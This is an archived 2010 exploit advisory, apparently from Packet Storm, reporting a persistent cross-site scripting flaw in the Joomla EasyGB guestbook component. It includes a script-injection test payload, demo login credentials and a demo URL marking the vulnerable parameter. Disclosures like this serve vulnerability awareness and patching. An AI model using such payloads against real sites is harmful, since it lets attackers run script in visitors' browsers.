Joomla EasyGB Cross Site Scripting

🗓️ 12 Jun 2010 00:00:00Reported by L0rd CrusAd3rType

packetstorm🔗 packetstormsecurity.com👁 24 Views

Joomla EasyGB Cross Site Scripting, Persistent XSS Vulnerability on Joomla GuestBook

`Author: L0rd CrusAd3r aka VSN [[email protected]]  
Exploit Title:Joomla Persistant XSS Vulnerable  
Published: 2010-06-08  
Vendor url:http://www.joomla-addons.org/  
Platform: Unix, Linux , Windows  
  
Greetz to:Sid3^effects, aa_Numb, M4n0, D4rk Blu3, KD and to all ICW members  
  
#############################################################################################################################################################################  
  
DESCRIPTION:  
  
Contains Persistant XSS on Joomla  
  
###############################################################################################################################################################################  
  
Vulnerability:  
  
Username: demo  
Password: demo  
  
The Site contains Persistant XSS Vulenrable on GuestBook  
  
demo URL:-  
  
Parameter:'"--><script>alert(0x000872)</script>  
  
http:http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6[XSS]  
  
################################################################################################################################################################################  
--   
With R3gards,  
L0rd CrusAd3r  
  
  
`

12 Jun 2010 00:00Current

7.4High risk

Vulners AI Score7.4